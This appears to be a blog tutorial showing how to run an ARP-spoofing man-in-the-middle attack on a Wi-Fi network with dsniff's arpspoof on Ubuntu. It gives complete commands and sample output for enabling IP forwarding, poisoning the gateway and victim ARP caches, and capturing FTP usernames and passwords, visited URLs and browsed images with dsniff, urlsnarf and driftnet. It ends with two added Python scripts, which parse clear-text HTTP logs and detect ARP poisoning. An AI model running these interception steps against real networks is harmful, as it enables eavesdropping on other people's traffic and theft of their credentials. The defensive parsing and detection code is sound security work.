MITM Using dsniff on Ubuntu

This blog post is purely for instructional purposes, to show how to set up the dsniff package on Ubuntu for a MITM attack using arpspoof.

My Ubuntu version: Ubuntu 18.04.3 LTS

anirbanb2004@Anisoft-Corporation:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 18.04.3 LTS
Release: 18.04
Codename: bionic
anirbanb2004@Anisoft-Corporation:~$

1. Let's run an update first so that the local package index is refreshed:

sudo apt-get update

This command can take quite some time to complete.

2. Now install the dsniff package:

sudo apt install dsniff

3. Once the installation has completed, validate that it was successful by running a test command such as:

sudo arpspoof

The output should say:

Version: 2.4
Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

4. Before starting the MITM we must enable IP forwarding on our machine, so that the traffic between the victim and the router is passed on by our laptop:

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

Note that the form “sudo echo 1 > /proc/sys/net/ipv4/ip_forward” does not work: the redirection is performed by your unprivileged shell, not by the root-owned echo, so the write is denied. Piping through “sudo tee”, or running “sudo sysctl -w net.ipv4.ip_forward=1”, writes the file as root.

This step is very important. Without it, traffic from the victim that is destined for the gateway will reach our machine but never make its way on to the gateway, and likewise the responses from the gateway will reach our machine but never make it back to the victim's browser.

5. Get the router/gateway's IP address by running the command “sudo arp -a”

anirbanb2004@Anisoft-Corporation:~$ sudo arp -a
_gateway (192.168.0.1) at 58:19:f8:f0:51:10 [ether] on wlan0

Here 192.168.0.1 is the IP of the router/gateway.

wlan0 is the network interface (we will need it a little later).

6. Choose a victim's IP. Here I chose my Samsung Note phone, which is connected to the same access point on the same Wi-Fi; from the phone's Wi-Fi settings I got its IP, “192.168.0.126”.

7. ARP-poison the gateway's view of the victim's IP:

sudo arpspoof -t 192.168.0.1 192.168.0.126

You will see lines like the ones below appearing; leave this terminal open and running.

anirbanb2004@Anisoft-Corporation:~$ sudo arpspoof -t 192.168.0.1 192.168.0.126
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28

8. Open another terminal and now ARP-poison the victim's view of the gateway IP:

sudo arpspoof -t 192.168.0.126 192.168.0.1

In this terminal you will see lines like the ones below appearing; leave this terminal running too and don't close it.

68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28
68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28

9. Your MITM attack is in place: your laptop now sits between the victim and the gateway for all non-secured traffic. Now let's intercept some of it.

Sniffing Passwords

10. Open a new terminal and type command : sudo dsniff -i wlan0 -m

Here wlan0 is the network interface we found with the command “arp -a”.

It will say “dsniff: listening on wlan0”.

11. Now on my mobile, which is the victim's device here, let's perform an FTP login.

FTP (File Transfer Protocol) is a sensitive operation: it is used to access and manage the file system on a server, and it sends the login credentials in clear text.

On the mobile browser access “ftp://anisoftcorporation.com”.

It will prompt for a login user name and password.

Enter some username and some password and tap Sign In.

12. On the laptop terminal where you ran the dsniff command, the username and password you entered in the mobile browser will appear as below:

11/17/19 23:27:29 tcp 192.168.0.126.37314 -> lnx36.securehostdns.com.21 (ftp)
USER adminuser
PASS funnycode

Sniffing URLs visited

13. Open another terminal and execute the command “sudo urlsnarf -i wlan0”

It should show output like below:

urlsnarf: listening on wlan0 [tcp port 80 or port 8080 or port 3128]

14. On the victim's device (here my mobile) I opened http://azsamhita.org/wp

On the terminal where urlsnarf is running you will see output like the below start to appear (the repetition is because the browser is loading each of the website's components: JS files, CSS files, images).

192.168.0.126 - - [17/Nov/2019:23:32:53 -0700] "GET http://azsamhita.org/wp/wp-includes/css/dist/block-library/style.min.css?ver=5.0.7 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
192.168.0.126 - - [17/Nov/2019:23:32:58 -0700] "GET http://azsamhita.org/wp/wp-content/plugins/widget-countdown/includes/gutenberg/style.css?ver=5.0.7 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
192.168.0.126 - - [17/Nov/2019:23:33:05 -0700] "GET http://azsamhita.org/wp/wp-content/plugins/jetpack/modules/shortcodes/css/jetpack-email-subscribe.css?ver=1.0 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"
192.168.0.126 - - [17/Nov/2019:23:33:11 -0700] "GET http://azsamhita.org/wp/wp-content/plugins/buddypress/bp-activity/css/mentions.min.css?ver=4.1.0 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"

15. On the mobile now open “http://anisoftcorporation.com”.

On your terminal you will see:

192.168.0.126 - - [17/Nov/2019:23:35:46 -0700] "GET http://anisoftcorporation.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"

If you look at this output you will see that it contains not only the URL the victim is visiting but also the device and browser information, “Mozilla/5.0 (Linux; Android 9; SM-N950U)”. The scary part is that it reveals the OS is Android 9 and the device a Samsung Note 5 🙂
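The urlsnarf lines above are written in the same Common Log Format that web servers use for their access logs, so they are easy to post-process. The Python script below is an added example, not code from the original post or from the dsniff package: it parses lines in that format (constructed sample lines, modelled on the output above, including one malformed line to show it is skipped) and summarises, per client, which hosts were fetched over plain HTTP and what platform string the browser exposed. The same parser runs unchanged over a web server's own access log, which is how a defender finds clients that still send clear-text HTTP and the device details they leak with every request.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# One urlsnarf / Common Log Format line, e.g.
# 192.168.0.126 - - [17/Nov/2019:23:32:53 -0700] "GET http://host/ HTTP/1.1" - - "referer" "user-agent"
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<protocol>[^"]*)" \S+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# The platform token is the first parenthesised group of a Mozilla/5.0 user agent
PLATFORM_RE = re.compile(r"\(([^)]*)\)")

# Constructed sample input, modelled on the urlsnarf output shown in the post
SAMPLE_URLSNARF = [
    '192.168.0.126 - - [17/Nov/2019:23:32:53 -0700] "GET http://azsamhita.org/wp/wp-includes/css/dist/block-library/style.min.css?ver=5.0.7 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    '192.168.0.126 - - [17/Nov/2019:23:32:58 -0700] "GET http://azsamhita.org/wp/wp-content/plugins/widget-countdown/includes/gutenberg/style.css?ver=5.0.7 HTTP/1.1" - - "http://azsamhita.org/wp/" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    '192.168.0.126 - - [17/Nov/2019:23:35:46 -0700] "GET http://anisoftcorporation.com/ HTTP/1.1" - - "-" "Mozilla/5.0 (Linux; Android 9; SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.96 Mobile Safari/537.36"',
    "this line is not in log format and must be skipped",
]


def parse_clf_line(line):
    """Parse one CLF line into a dict of its fields, or return None if it does not match."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def platform_of(user_agent):
    """Return the platform token, e.g. 'Linux; Android 9; SM-N950U', or '' when absent."""
    m = PLATFORM_RE.search(user_agent)
    return m.group(1) if m else ""


def summarize_cleartext(lines):
    """Group plain-http requests per client: request count, hosts contacted, platforms exposed."""
    per_client = defaultdict(lambda: {"requests": 0, "hosts": set(), "platforms": set()})
    for line in lines:
        rec = parse_clf_line(line)
        if rec is None:
            continue  # malformed or non-log line
        parsed = urlparse(rec["url"])
        if parsed.scheme != "http":
            continue  # only clear-text HTTP is of interest here
        entry = per_client[rec["client"]]
        entry["requests"] += 1
        entry["hosts"].add(parsed.hostname)
        entry["platforms"].add(platform_of(rec["user_agent"]))
    # Freeze the sets into sorted lists so the result is deterministic
    return {
        client: {
            "requests": e["requests"],
            "hosts": sorted(e["hosts"]),
            "platforms": sorted(e["platforms"]),
        }
        for client, e in per_client.items()
    }


if __name__ == "__main__":
    for client, info in summarize_cleartext(SAMPLE_URLSNARF).items():
        print(client, info)
```

Feeding it the three sample lines reports one client, 192.168.0.126, with three clear-text requests to azsamhita.org and anisoftcorporation.com and the platform token "Linux; Android 9; SM-N950U"; the malformed line is dropped rather than crashing the parser.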

Sniffing Images Browsed

16. We need to install one more package, called “driftnet”. Install it with the command:

sudo apt-get install driftnet

17. With the ARP poisoning terminals still running, open another terminal and execute driftnet as “driftnet”

18. It will open a popup window.

19. On the mobile device open a new tab in incognito mode and open “http://azsamhita.org”

You will see all the images, starting with the site logo, loading into that popup.

After establishing ourselves in the middle of the traffic flow between the gateway and the victim, all we did above was observe the traffic. There is more that can be done; I will have another post that continues from here: DNSSPOOF.

But before that, let's see whether there is a way to know if I am under a MITM attack. Follow this post, “Tracking MITM”.
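The arpspoof output shown at steps 7 and 8 is itself the evidence a defender can look for: a single MAC address (68:17:29:8:cf:28) is sending ARP replies that claim to be both the gateway and the phone, and each of those IPs suddenly has a different MAC from the one the ARP table showed at step 5. The Python script below is an added example, not code from the original post or from dsniff, and is a small detector built on exactly those signals. It takes a baseline parsed from “arp -a” output and a stream of ARP-reply lines in the text format printed above (both are constructed samples modelled on the output in the post; the phone's MAC a0:c9:a0:7d:5a:d8 is an assumption taken from the destination of the step 8 replies) and raises an alert when an IP changes MAC relative to the baseline, when one MAC claims more than one IP, or when the frame's source MAC differs from the MAC it advertises.

```python
import re
from collections import defaultdict

# An "arp -a" line as shown at step 5:
# _gateway (192.168.0.1) at 58:19:f8:f0:51:10 [ether] on wlan0
ARP_A_RE = re.compile(r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>[0-9a-fA-F:]+)")

# An ARP reply line in the text format printed at steps 7 and 8:
# 68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28
ARP_REPLY_RE = re.compile(
    r"^(?P<src_mac>[0-9a-fA-F:]+)\s+(?P<dst_mac>[0-9a-fA-F:]+)\s+0806\s+\d+:\s+"
    r"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-fA-F:]+)$"
)

# Constructed baseline modelled on step 5; the phone's MAC is an assumption
SAMPLE_ARP_A = [
    "_gateway (192.168.0.1) at 58:19:f8:f0:51:10 [ether] on wlan0",
    "? (192.168.0.126) at a0:c9:a0:7d:5a:d8 [ether] on wlan0",
]

# Constructed reply stream: one legitimate reply from the gateway, then
# poisoning replies in the exact format shown at steps 7 and 8
SAMPLE_REPLIES = [
    "58:19:f8:f0:51:10 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 58:19:f8:f0:51:10",
    "68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28",
    "68:17:29:8:cf:28 58:19:f8:f0:51:10 0806 42: arp reply 192.168.0.126 is-at 68:17:29:8:cf:28",
    "68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28",
    "68:17:29:8:cf:28 a0:c9:a0:7d:5a:d8 0806 42: arp reply 192.168.0.1 is-at 68:17:29:8:cf:28",
]


def normalize_mac(mac):
    """Lower-case and zero-pad each octet so 68:17:29:8:cf:28 equals 68:17:29:08:cf:28."""
    return ":".join(part.zfill(2) for part in mac.lower().split(":"))


def parse_arp_table(lines):
    """Build an ip -> mac baseline from 'arp -a' output lines; non-matching lines are ignored."""
    table = {}
    for line in lines:
        m = ARP_A_RE.search(line)
        if m:
            table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


def analyze_arp_replies(lines, baseline):
    """Return (alerts, claims): unique alerts in first-seen order, and mac -> set of IPs it claimed."""
    baseline = {ip: normalize_mac(mac) for ip, mac in baseline.items()}
    claims = defaultdict(set)
    alerts, seen = [], set()

    def alert(msg):
        # Poisoning replies repeat every couple of seconds; report each finding once
        if msg not in seen:
            seen.add(msg)
            alerts.append(msg)

    for line in lines:
        m = ARP_REPLY_RE.match(line.strip())
        if not m:
            continue  # not an ARP reply line
        ip = m.group("ip")
        sender = normalize_mac(m.group("src_mac"))
        claimed = normalize_mac(m.group("mac"))
        # Signal 1: the Ethernet source does not match the MAC the reply advertises
        if sender != claimed:
            alert(f"{ip}: reply sent from {sender} but advertises {claimed}")
        # Signal 2: an IP in the baseline has changed hardware address
        expected = baseline.get(ip)
        if expected is not None and expected != claimed:
            alert(f"{ip}: MAC changed from {expected} to {claimed}")
        # Signal 3: one hardware address claiming several IPs (gateway and host at once)
        claims[claimed].add(ip)
        if len(claims[claimed]) > 1:
            alert(f"{claimed}: one MAC claims {sorted(claims[claimed])}")
    return alerts, dict(claims)


if __name__ == "__main__":
    found, _ = analyze_arp_replies(SAMPLE_REPLIES, parse_arp_table(SAMPLE_ARP_A))
    for a in found:
        print("ALERT", a)
```

On the sample stream the legitimate gateway reply produces nothing, while the poisoning replies produce three alerts: the phone's IP changing MAC, the gateway's IP changing MAC, and 68:17:29:08:cf:28 claiming both addresses at once. In practice the baseline would be captured while the network is known to be clean, and the reply stream would come from a packet capture on the interface rather than from arpspoof's own output.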
